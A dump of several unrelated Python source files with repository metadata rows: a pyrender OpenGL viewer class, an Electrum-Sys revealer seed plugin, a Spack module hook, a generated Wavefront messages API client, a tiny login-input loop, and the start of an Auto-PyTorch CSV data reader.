for n in self._raymond_lights:
if self.scene.has_node(n):
self.scene.remove_node(n)
if self.viewer_flags['use_direct_lighting']:
if self.scene.has_node(self._direct_light):
self.scene.remove_node(self._direct_light)
# Delete any axis nodes that we've attached
self._remove_axes()
# Delete renderer
if self._renderer is not None:
self._renderer.delete()
self._renderer = None
# Force clean-up of OpenGL context data
try:
OpenGL.contextdata.cleanupContext()
self.close()
except Exception:
pass
finally:
self._is_active = False
super(Viewer, self).on_close()
pyglet.app.exit()
def on_draw(self):
"""Redraw the scene into the viewing window.
"""
if self._renderer is None:
return
if self.run_in_thread:
self.render_lock.acquire()
# Make OpenGL context current
self.switch_to()
# Render the scene
self.clear()
self._render()
if self._message_text is not None:
self._renderer.render_text(
self._message_text,
self.viewport_size[0] - TEXT_PADDING,
TEXT_PADDING,
font_pt=20,
color=np.array([0.1, 0.7, 0.2,
np.clip(self._message_opac, 0.0, 1.0)]),
align=TextAlign.BOTTOM_RIGHT
)
if self.viewer_flags['caption'] is not None:
for caption in self.viewer_flags['caption']:
xpos, ypos = self._location_to_x_y(caption['location'])
self._renderer.render_text(
caption['text'],
xpos,
ypos,
font_name=caption['font_name'],
font_pt=caption['font_pt'],
color=caption['color'],
scale=caption['scale'],
align=caption['location']
)
if self.run_in_thread:
self.render_lock.release()
def on_resize(self, width, height):
"""Resize the camera and trackball when the window is resized.
"""
if self._renderer is None:
return
self._viewport_size = (width, height)
self._trackball.resize(self._viewport_size)
self._renderer.viewport_width = self._viewport_size[0]
self._renderer.viewport_height = self._viewport_size[1]
self.on_draw()
def on_mouse_press(self, x, y, buttons, modifiers):
"""Record an initial mouse press.
"""
self._trackball.set_state(Trackball.STATE_ROTATE)
if (buttons == pyglet.window.mouse.LEFT):
ctrl = (modifiers & pyglet.window.key.MOD_CTRL)
shift = (modifiers & pyglet.window.key.MOD_SHIFT)
if (ctrl and shift):
self._trackball.set_state(Trackball.STATE_ZOOM)
elif ctrl:
self._trackball.set_state(Trackball.STATE_ROLL)
elif shift:
self._trackball.set_state(Trackball.STATE_PAN)
elif (buttons == pyglet.window.mouse.MIDDLE):
self._trackball.set_state(Trackball.STATE_PAN)
elif (buttons == pyglet.window.mouse.RIGHT):
self._trackball.set_state(Trackball.STATE_ZOOM)
self._trackball.down(np.array([x, y]))
# Stop animating while using the mouse
self.viewer_flags['mouse_pressed'] = True
def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):
"""Record a mouse drag.
"""
self._trackball.drag(np.array([x, y]))
def on_mouse_release(self, x, y, button, modifiers):
"""Record a mouse release.
"""
self.viewer_flags['mouse_pressed'] = False
def on_mouse_scroll(self, x, y, dx, dy):
"""Record a mouse scroll.
"""
if self.viewer_flags['use_perspective_cam']:
self._trackball.scroll(dy)
else:
spfc = 0.95
spbc = 1.0 / 0.95
sf = 1.0
if dy > 0:
sf = spfc * dy
elif dy < 0:
sf = - spbc * dy
c = self._camera_node.camera
xmag = max(c.xmag * sf, 1e-8)
ymag = max(c.ymag * sf, 1e-8 * c.ymag / c.xmag)
c.xmag = xmag
c.ymag = ymag
def on_key_press(self, symbol, modifiers):
"""Record a key press.
"""
# First, check for registered key callbacks
if symbol in self.registered_keys:
tup = self.registered_keys[symbol]
callback = None
args = []
kwargs = {}
if not isinstance(tup, (list, tuple, np.ndarray)):
callback = tup
else:
callback = tup[0]
if len(tup) == 2:
args = tup[1]
if len(tup) == 3:
kwargs = tup[2]
callback(self, *args, **kwargs)
return
# Otherwise, use default key functions
# A causes the frame to rotate
self._message_text = None
if symbol == pyglet.window.key.A:
self.viewer_flags['rotate'] = not self.viewer_flags['rotate']
if self.viewer_flags['rotate']:
self._message_text = 'Rotation On'
else:
self._message_text = 'Rotation Off'
# C toggles backface culling
elif symbol == pyglet.window.key.C:
self.render_flags['cull_faces'] = (
not self.render_flags['cull_faces']
)
if self.render_flags['cull_faces']:
self._message_text = 'Cull Faces On'
else:
self._message_text = 'Cull Faces Off'
# F toggles face normals
elif symbol == pyglet.window.key.F:
self.viewer_flags['fullscreen'] = (
not self.viewer_flags['fullscreen']
)
self.set_fullscreen(self.viewer_flags['fullscreen'])
self.activate()
if self.viewer_flags['fullscreen']:
self._message_text = 'Fullscreen On'
else:
self._message_text = 'Fullscreen Off'
# S toggles shadows
elif symbol == pyglet.window.key.H and sys.platform != 'darwin':
self.render_flags['shadows'] = not self.render_flags['shadows']
if self.render_flags['shadows']:
self._message_text = 'Shadows On'
else:
self._message_text = 'Shadows Off'
elif symbol == pyglet.window.key.I:
if (self.viewer_flags['show_world_axis'] and not
self.viewer_flags['show_mesh_axes']):
self.viewer_flags['show_world_axis'] = False
self.viewer_flags['show_mesh_axes'] = True
self._set_axes(False, True)
self._message_text = 'Mesh Axes On'
elif (not self.viewer_flags['show_world_axis'] and
self.viewer_flags['show_mesh_axes']):
self.viewer_flags['show_world_axis'] = True
self.viewer_flags['show_mesh_axes'] = True
self._set_axes(True, True)
self._message_text = 'All Axes On'
elif (self.viewer_flags['show_world_axis'] and
self.viewer_flags['show_mesh_axes']):
self.viewer_flags['show_world_axis'] = False
self.viewer_flags['show_mesh_axes'] = False
self._set_axes(False, False)
self._message_text = 'All Axes Off'
else:
self.viewer_flags['show_world_axis'] = True
self.viewer_flags['show_mesh_axes'] = False
self._set_axes(True, False)
self._message_text = 'World Axis On'
# L toggles the lighting mode
elif symbol == pyglet.window.key.L:
if self.viewer_flags['use_raymond_lighting']:
self.viewer_flags['use_raymond_lighting'] = False
self.viewer_flags['use_direct_lighting'] = True
self._message_text = 'Direct Lighting'
elif self.viewer_flags['use_direct_lighting']:
self.viewer_flags['use_raymond_lighting'] = False
self.viewer_flags['use_direct_lighting'] = False
self._message_text = 'Default Lighting'
else:
self.viewer_flags['use_raymond_lighting'] = True
self.viewer_flags['use_direct_lighting'] = False
self._message_text = 'Raymond Lighting'
# M toggles face normals
elif symbol == pyglet.window.key.M:
self.render_flags['face_normals'] = (
not self.render_flags['face_normals']
)
if self.render_flags['face_normals']:
self._message_text = 'Face Normals On'
else:
self._message_text = 'Face Normals Off'
# N toggles vertex normals
elif symbol == pyglet.window.key.N:
self.render_flags['vertex_normals'] = (
not self.render_flags['vertex_normals']
)
if self.render_flags['vertex_normals']:
self._message_text = 'Vert Normals On'
else:
self._message_text = 'Vert Normals Off'
# O toggles orthographic camera mode
elif symbol == pyglet.window.key.O:
self.viewer_flags['use_perspective_cam'] = (
not self.viewer_flags['use_perspective_cam']
)
if self.viewer_flags['use_perspective_cam']:
camera = self._default_persp_cam
self._message_text = 'Perspective View'
else:
camera = self._default_orth_cam
self._message_text = 'Orthographic View'
cam_pose = self._camera_node.matrix.copy()
cam_node = Node(matrix=cam_pose, camera=camera)
self.scene.remove_node(self._camera_node)
self.scene.add_node(cam_node)
self.scene.main_camera_node = cam_node
self._camera_node = cam_node
# Q quits the viewer
elif symbol == pyglet.window.key.Q:
self.on_close()
# R starts recording frames
elif symbol == pyglet.window.key.R:
if self.viewer_flags['record']:
self.save_gif()
self.set_caption(self.viewer_flags['window_title'])
else:
self.set_caption(
'{} (RECORDING)'.format(self.viewer_flags['window_title'])
)
self.viewer_flags['record'] = not self.viewer_flags['record']
# S saves the current frame as an image
elif symbol == pyglet.window.key.S:
self._save_image()
# W toggles through wireframe modes
elif symbol == pyglet.window.key.W:
if self.render_flags['flip_wireframe']:
self.render_flags['flip_wireframe'] = False
self.render_flags['all_wireframe'] = True
self.render_flags['all_solid'] = False
self._message_text = 'All Wireframe'
elif self.render_flags['all_wireframe']:
self.render_flags['flip_wireframe'] = False
self.render_flags['all_wireframe'] = False
self.render_flags['all_solid'] = True
self._message_text = 'All Solid'
elif self.render_flags['all_solid']:
self.render_flags['flip_wireframe'] = False
self.render_flags['all_wireframe'] = False
self.render_flags['all_solid'] = False
self._message_text = 'Default Wireframe'
else:
self.render_flags['flip_wireframe'] = True
self.render_flags['all_wireframe'] = False
self.render_flags['all_solid'] = False
self._message_text = 'Flip Wireframe'
# Z resets the camera viewpoint
elif symbol == pyglet.window.key.Z:
self._reset_view()
if self._message_text is not None:
self._message_opac = 1.0 + self._ticks_till_fade
@staticmethod
def _time_event(dt, self):
"""The timer callback.
"""
# Don't run old dead events after we've already closed
if not self._is_active:
return
if self.viewer_flags['record']:
self._record()
if (self.viewer_flags['rotate'] and not
self.viewer_flags['mouse_pressed']):
self._rotate()
# Manage message opacity
if self._message_text is not None:
if self._message_opac > 1.0:
self._message_opac -= 1.0
else:
self._message_opac *= 0.90
if self._message_opac < 0.05:
self._message_opac = 1.0 + self._ticks_till_fade
self._message_text = None
if self._should_close:
self.on_close()
else:
self.on_draw()
def _reset_view(self):
"""Reset the view to a good initial state.
The view is initially along the positive x-axis at a
sufficient distance from the scene.
"""
scale = self.scene.scale
if scale == 0.0:
scale = DEFAULT_SCENE_SCALE
centroid = self.scene.centroid
if self.viewer_flags['view_center'] is not None:
centroid = self.viewer_flags['view_center']
self._camera_node.matrix = self._default_camera_pose
self._trackball = Trackball(
self._default_camera_pose, self.viewport_size, scale, centroid
)
def _get_save_filename(self, file_exts):
file_types = {
'png': ('png files', '*.png'),
'jpg': ('jpeg files', '*.jpg'),
'gif': ('gif files', '*.gif'),
'all': ('all files', '*'),
}
filetypes = [file_types[x] for x in file_exts]
try:
root = Tk()
save_dir = self.viewer_flags['save_directory']
if save_dir is None:
save_dir = os.getcwd()
filename = filedialog.asksaveasfilename(
initialdir=save_dir, title='Select file save location',
filetypes=filetypes
)
except Exception:
return None
root.destroy()
if filename == ():
return None
return filename
def _save_image(self):
filename = self._get_save_filename(['png', 'jpg', 'gif', 'all'])
if filename is not None:
self.viewer_flags['save_directory'] = os.path.dirname(filename)
imageio.imwrite(filename, self._renderer.read_color_buf())
def _record(self):
"""Save another frame for the GIF.
"""
data = self._renderer.read_color_buf()
if not np.all(data == 0.0):
self._saved_frames.append(data)
def _rotate(self):
"""Animate the scene by rotating the camera.
"""
az = (self.viewer_flags['rotate_rate'] /
self.viewer_flags['refresh_rate'])
self._trackball.rotate(az, self.viewer_flags['rotate_axis'])
def _render(self):
"""Render the scene into the framebuffer and flip.
"""
scene = self.scene
self._camera_node.matrix = self._trackball.pose.copy()
# Set lighting
vli = self.viewer_flags['lighting_intensity']
if self.viewer_flags['use_raymond_lighting']:
for n in self._raymond_lights:
n.light.intensity = vli / 3.0
if not self.scene.has_node(n):
scene.add_node(n, parent_node=self._camera_node)
else:
self._direct_light.light.intensity = vli
for n in self._raymond_lights:
if self.scene.has_node(n):
self.scene.remove_node(n)
if self.viewer_flags['use_direct_lighting']:
if not self.scene.has_node(self._direct_light):
scene.add_node(
self._direct_light, parent_node=self._camera_node
)
elif self.scene.has_node(self._direct_light):
self.scene.remove_node(self._direct_light)
flags = RenderFlags.NONE
if self.render_flags['flip_wireframe']:
flags |= RenderFlags.FLIP_WIREFRAME
elif self.render_flags['all_wireframe']:
flags |= RenderFlags.ALL_WIREFRAME
elif self.render_flags['all_solid']:
flags |= RenderFlags.ALL_SOLID
if self.render_flags['shadows']:
flags |= RenderFlags.SHADOWS_DIRECTIONAL | RenderFlags.SHADOWS_SPOT
if self.render_flags['vertex_normals']:
flags |= RenderFlags.VERTEX_NORMALS
if self.render_flags['face_normals']:
flags |= RenderFlags.FACE_NORMALS
if not self.render_flags['cull_faces']:
flags |= RenderFlags.SKIP_CULL_FACES
self._renderer.render(self.scene, flags)
def _init_and_start_app(self):
from pyglet.gl import Config
conf = Config(sample_buffers=1, samples=4,
depth_size=24, double_buffer=True,
major_version=OPEN_GL_MAJOR,
minor_version=OPEN_GL_MINOR)
super(Viewer, self).__init__(config=conf, resizable=True,
width=self._viewport_size[0],
height=self._viewport_size[1])
if self.context.config.major_version < 3:
raise ValueError('Unable to initialize an OpenGL 3+ context')
clock.schedule_interval(
Viewer._time_event, 1.0 / self.viewer_flags['refresh_rate'], self
)
self.switch_to()
self.set_caption(self.viewer_flags['window_title'])
pyglet.app.run()
def _compute_initial_camera_pose(self):
centroid = self.scene.centroid
if self.viewer_flags['view_center'] is not None:
centroid = self.viewer_flags['view_center']
scale = self.scene.scale
if scale == 0.0:
scale = DEFAULT_SCENE_SCALE
s2 = 1.0 / np.sqrt(2.0)
cp = np.eye(4)
cp[:3,:3] = np.array([
[0.0, -s2, s2],
[1.0, 0.0, 0.0],
[0.0, s2, s2]
])
hfov = np.pi / 6.0
dist = scale / (2.0 * np.tan(hfov))
cp[:3,3] = dist * np.array([1.0, 0.0, 1.0]) + centroid
return cp
def _create_raymond_lights(self):
thetas = np.pi * np.array([1.0 / 6.0, 1.0 / 6.0, 1.0 / 6.0])
phis = np.pi * np.array([0.0, 2.0 / 3.0, 4.0 / 3.0])
nodes = []
for phi, theta in zip(phis, thetas):
xp = np.sin(theta) * np.cos(phi)
yp = np.sin(theta) * np.sin(phi)
zp = np.cos(theta)
z = np.array([xp, yp, zp])
z = z / np.linalg.norm(z)
x = np.array([-z[1], z[0], 0.0])
if np.linalg.norm(x) == 0:
x = np.array([1.0, 0.0, 0.0])
x = x / np.linalg.norm(x)
y = np.cross(z, x)
matrix = np.eye(4)
matrix[:3,:3] = np.c_[x,y,z]
nodes.append(Node(
light=DirectionalLight(color=np.ones(3), intensity=1.0),
matrix=matrix
))
return nodes
def _create_direct_light(self):
light = DirectionalLight(color=np.ones(3), intensity=1.0)
n = Node(light=light, matrix=np.eye(4))
return n
def _set_axes(self, world, mesh):
scale = self.scene.scale
if world:
if 'scene' not in self._axes:
n = Node(mesh=self._axis_mesh, scale=np.ones(3) * scale * 0.3)
self.scene.add_node(n)
self._axes['scene'] = n
else:
if 'scene' in self._axes:
self.scene.remove_node(self._axes['scene'])
self._axes.pop('scene')
if mesh:
old_nodes = []
existing_axes = set([self._axes[k] for k in self._axes])
for node in self.scene.mesh_nodes:
if node not in existing_axes:
old_nodes.append(node)
for node in old_nodes:
if node in self._axes:
continue
n = Node(
mesh=self._axis_mesh,
scale=np.ones(3) * node.mesh.scale * 0.5
)
self.scene.add_node(n, parent_node=node)
self._axes[node] = n
else:
to_remove = set()
for main_node in self._axes:
if main_node in self.scene.mesh_nodes:
self.scene.remove_node(self._axes[main_node])
to_remove.add(main_node)
for main_node in to_remove:
self._axes.pop(main_node)
def _remove_axes(self):
for main_node in self._axes:
axis_node = self._axes[main_node]
self.scene.remove_node(axis_node)
self._axes = {}
def _location_to_x_y(self, location):
if location == TextAlign.CENTER:
return (self.viewport_size[0] / 2.0, self.viewport_size[1] / 2.0)
elif location == TextAlign.CENTER_LEFT:
return (TEXT_PADDING, self.viewport_size[1] / 2.0)
elif location == TextAlign.CENTER_RIGHT:
return (self.viewport_size[0] - TEXT_PADDING,
self.viewport_size[1] / 2.0)
elif location == TextAlign.BOTTOM_LEFT:
return (TEXT_PADDING, TEXT_PADDING)
elif location == TextAlign.BOTTOM_RIGHT:
return (self.viewport_size[0] - TEXT_PADDING, TEXT_PADDING)
elif location == TextAlign.BOTTOM_CENTER:
return (self.viewport_size[0] / 2.0, TEXT_PADDING)
elif location == TextAlign.TOP_LEFT:
return (TEXT_PADDING, self.viewport_size[1] - TEXT_PADDING)
elif location == TextAlign.TOP_RIGHT:
return (self.viewport_size[0] - TEXT_PADDING,
self.viewport_size[1] - TEXT_PADDING)
elif location == TextAlign.TOP_CENTER:
return (self.viewport_size[0] / 2.0,
self.viewport_size[1] - TEXT_PADDING)
__all__ = ['Viewer']
| 38.202834
| 88
| 0.571399
|
5f7e13a979805a3a5ace82b752da0eec596f6153
| 3,561
|
py
|
Python
|
electrumsys/plugins/revealer/revealer.py
|
syscoin/electrum
|
ac576539c758640ff87ed6be1311eb57b57d205f
|
[
"MIT"
] | 1
|
2019-06-26T16:51:43.000Z
|
2019-06-26T16:51:43.000Z
|
electrumsys/plugins/revealer/revealer.py
|
syscoin/electrumsys
|
ac576539c758640ff87ed6be1311eb57b57d205f
|
[
"MIT"
] | null | null | null |
electrumsys/plugins/revealer/revealer.py
|
syscoin/electrumsys
|
ac576539c758640ff87ed6be1311eb57b57d205f
|
[
"MIT"
] | 1
|
2018-09-10T21:43:02.000Z
|
2018-09-10T21:43:02.000Z
|
import random
import os
from hashlib import sha256
from typing import NamedTuple, Optional, Dict, Tuple
from electrumsys.plugin import BasePlugin
from electrumsys.util import to_bytes, bh2u, bfh
from .hmac_drbg import DRBG
class VersionedSeed(NamedTuple):
version: str
seed: str
checksum: str
def get_ui_string_version_plus_seed(self):
version, seed = self.version, self.seed
assert isinstance(version, str) and len(version) == 1, version
assert isinstance(seed, str) and len(seed) >= 32
ret = version + seed
ret = ret.upper()
return ' '.join(ret[i : i+4] for i in range(0, len(ret), 4))
class RevealerPlugin(BasePlugin):
LATEST_VERSION = '1'
KNOWN_VERSIONS = ('0', '1')
assert LATEST_VERSION in KNOWN_VERSIONS
SIZE = (159, 97)
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
@classmethod
def code_hashid(cls, txt: str) -> str:
txt = txt.lower()
x = to_bytes(txt, 'utf8')
hash = sha256(x).hexdigest()
return hash[-3:].upper()
@classmethod
def get_versioned_seed_from_user_input(cls, txt: str) -> Optional[VersionedSeed]:
if len(txt) < 34:
return None
try:
int(txt, 16)
except:
return None
version = txt[0]
if version not in cls.KNOWN_VERSIONS:
return None
checksum = cls.code_hashid(txt[:-3])
if txt[-3:].upper() != checksum.upper():
return None
return VersionedSeed(version=version.upper(),
seed=txt[1:-3].upper(),
checksum=checksum.upper())
@classmethod
def get_noise_map(cls, versioned_seed: VersionedSeed) -> Dict[Tuple[int, int], int]:
"""Returns a map from (x,y) coordinate to pixel value 0/1, to be used as rawnoise."""
w, h = cls.SIZE
version = versioned_seed.version
hex_seed = versioned_seed.seed
checksum = versioned_seed.checksum
noise_map = {}
if version == '0':
random.seed(int(hex_seed, 16))
for x in range(w):
for y in range(h):
noise_map[(x, y)] = random.randint(0, 1)
elif version == '1':
prng_seed = bfh(hex_seed + version + checksum)
drbg = DRBG(prng_seed)
num_noise_bytes = 1929 # ~ w*h
noise_array = bin(int.from_bytes(drbg.generate(num_noise_bytes), 'big'))[2:]
# there's an approx 1/1024 chance that the generated number is 'too small'
# and we would get IndexError below. easiest backwards compat fix:
noise_array += '0' * (w * h - len(noise_array))
i = 0
for x in range(w):
for y in range(h):
noise_map[(x, y)] = int(noise_array[i])
i += 1
else:
raise Exception(f"unexpected revealer version: {version}")
return noise_map
@classmethod
def gen_random_versioned_seed(cls):
version = cls.LATEST_VERSION
hex_seed = bh2u(os.urandom(16))
checksum = cls.code_hashid(version + hex_seed)
return VersionedSeed(version=version.upper(),
seed=hex_seed.upper(),
checksum=checksum.upper())
if __name__ == '__main__':
for i in range(10**4):
vs = RevealerPlugin.gen_random_versioned_seed()
nm = RevealerPlugin.get_noise_map(vs)
| 33.59434
| 93
| 0.579051
|
8e7a5dfda3473634172982b58de10cc83690024c
| 265
|
py
|
Python
|
topicos/10_strings/respostas/LoginValido.py
|
erosvitor/curso-python-fundamentos
|
daf113f08f724f6e7a92977799c76f49a021e5bd
|
[
"MIT"
] | null | null | null |
topicos/10_strings/respostas/LoginValido.py
|
erosvitor/curso-python-fundamentos
|
daf113f08f724f6e7a92977799c76f49a021e5bd
|
[
"MIT"
] | null | null | null |
topicos/10_strings/respostas/LoginValido.py
|
erosvitor/curso-python-fundamentos
|
daf113f08f724f6e7a92977799c76f49a021e5bd
|
[
"MIT"
] | null | null | null |
#!python3
print("Login")
print("")
loginValido = False
while not loginValido:
login = input("Digite o login: ")
if login.strip():
print("Login válido.")
loginValido = True
else:
print("Login inválido, tente novamente.")
loginValido = False
| 16.5625
| 45
| 0.656604
|
363654efc40d7ca4613b8d9352eb6dfea0b4c779
| 1,018
|
py
|
Python
|
lib/spack/spack/hooks/module_file_generation.py
|
kkauder/spack
|
6ae8d5c380c1f42094b05d38be26b03650aafb39
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-10T13:47:48.000Z
|
2019-04-17T13:05:17.000Z
|
lib/spack/spack/hooks/module_file_generation.py
|
kkauder/spack
|
6ae8d5c380c1f42094b05d38be26b03650aafb39
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 17
|
2019-03-21T15:54:00.000Z
|
2022-03-29T19:34:28.000Z
|
lib/spack/spack/hooks/module_file_generation.py
|
kkauder/spack
|
6ae8d5c380c1f42094b05d38be26b03650aafb39
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-04-07T18:27:09.000Z
|
2022-03-31T22:52:38.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import spack.config
import spack.modules
import spack.modules.common
import llnl.util.tty as tty
def _for_each_enabled(spec, method_name):
"""Calls a method for each enabled module"""
enabled = spack.config.get('modules:enable')
if not enabled:
tty.debug('NO MODULE WRITTEN: list of enabled module files is empty')
return
for name in enabled:
generator = spack.modules.module_types[name](spec)
try:
getattr(generator, method_name)()
except RuntimeError as e:
msg = 'cannot perform the requested {0} operation on module files'
msg += ' [{1}]'
tty.warn(msg.format(method_name, str(e)))
def post_install(spec):
_for_each_enabled(spec, 'write')
def post_uninstall(spec):
_for_each_enabled(spec, 'remove')
| 29.085714
| 78
| 0.682711
|
2999593581b7b885aa192f7b9b50013fd436c1c3
| 8,536
|
py
|
Python
|
wavefront_api_client/api/message_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 11
|
2016-05-30T17:16:45.000Z
|
2021-06-11T19:32:59.000Z
|
wavefront_api_client/api/message_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 25
|
2016-05-02T23:05:19.000Z
|
2020-11-18T22:43:20.000Z
|
wavefront_api_client/api/message_api.py
|
PowerOlive/python-client
|
eebda67381fcf893914c309103878236b609a70b
|
[
"Apache-2.0"
] | 30
|
2016-04-29T17:17:11.000Z
|
2022-02-11T04:58:37.000Z
|
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class MessageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def user_get_messages(self, **kwargs): # noqa: E501
"""Gets messages applicable to the current user, i.e. within time range and distribution scope # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_get_messages(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:param bool unread_only:
:return: ResponseContainerPagedMessage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.user_get_messages_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.user_get_messages_with_http_info(**kwargs) # noqa: E501
return data
def user_get_messages_with_http_info(self, **kwargs): # noqa: E501
"""Gets messages applicable to the current user, i.e. within time range and distribution scope # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_get_messages_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:param bool unread_only:
:return: ResponseContainerPagedMessage
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'unread_only'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method user_get_messages" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'unread_only' in params:
query_params.append(('unreadOnly', params['unread_only'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/message', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerPagedMessage', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def user_read_message(self, id, **kwargs): # noqa: E501
"""Mark a specific message as read # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_read_message(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerMessage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.user_read_message_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.user_read_message_with_http_info(id, **kwargs) # noqa: E501
return data
def user_read_message_with_http_info(self, id, **kwargs): # noqa: E501
"""Mark a specific message as read # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.user_read_message_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerMessage
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method user_read_message" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `user_read_message`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/message/{id}/read', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerMessage', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.275109
| 409
| 0.611176
|
5d7d7d85d2ad50b3d2d4ca0dca49023644f7a13a
| 9,663
|
py
|
Python
|
autoPyTorch/data_management/data_reader.py
|
urbanmatthias/Auto-PyTorch
|
fe7c51b33c48041e405ef2975ee691c0539691ab
|
[
"BSD-3-Clause"
] | 1
|
2019-11-19T12:22:46.000Z
|
2019-11-19T12:22:46.000Z
|
autoPyTorch/data_management/data_reader.py
|
gaohuan2015/Auto-PyTorch
|
3c6bf7e051b32284d2655cc484aee1a8c982c04e
|
[
"Apache-2.0"
] | null | null | null |
autoPyTorch/data_management/data_reader.py
|
gaohuan2015/Auto-PyTorch
|
3c6bf7e051b32284d2655cc484aee1a8c982c04e
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function, division
import pandas as pd
import numpy as np
from abc import abstractmethod
import os
from scipy.sparse import csr_matrix
import math
from autoPyTorch.data_management.data_converter import DataConverter
__author__ = "Max Dippel, Michael Burkart and Matthias Urban"
__version__ = "0.0.1"
__license__ = "BSD"
class DataReader(object):
def __init__(self, file_name, is_classification=None):
self.file_name = file_name
self.data = None
self.X = None
self.Y = None
self.X_valid = None
self.Y_valid = None
self.X_test = None
self.Y_test = None
self.is_classification = is_classification
self.categorical_features = None
self.is_multilabel = None
self.max_runtime = None
self.metric = None
@abstractmethod
def read(self):
return
def convert(self, **kwargs):
"""
Convert the data using standard data converter with standard settings.
Arguments:
**kwargs: args and kwargs are passed to Dataconverter
"""
data_converter = DataConverter(is_classification=self.is_classification, is_multilabel=self.is_multilabel, **kwargs)
self.X, self.Y, self.is_classification, self.is_multilabel, self.categorical_features = data_converter.convert(self.X, self.Y)
if self.X_valid is not None and self.Y_valid is not None:
self.X_valid, self.Y_valid, _, _, _ = data_converter.convert(self.X_valid, self.Y_valid)
if self.X_test is not None and self.Y_test is not None:
self.X_test, self.Y_test, _, _, _ = data_converter.convert(self.X_test, self.Y_test)
class CSVReader(DataReader):
def __init__(self, file_name, is_classification=None):
self.num_entries = None
self.num_features = None
self.num_classes = None
super(CSVReader, self).__init__(file_name, is_classification)
def read(self, auto_convert=True, **kwargs):
"""
Read the data from given csv file.
Arguments:
auto_convert: Automatically convert data after reading.
*args, **kwargs: arguments for converting.
"""
self.data = pd.read_csv(self.file_name)
self.num_entries = len(self.data)
self.num_features = len(self.data.iloc[0]) - 1
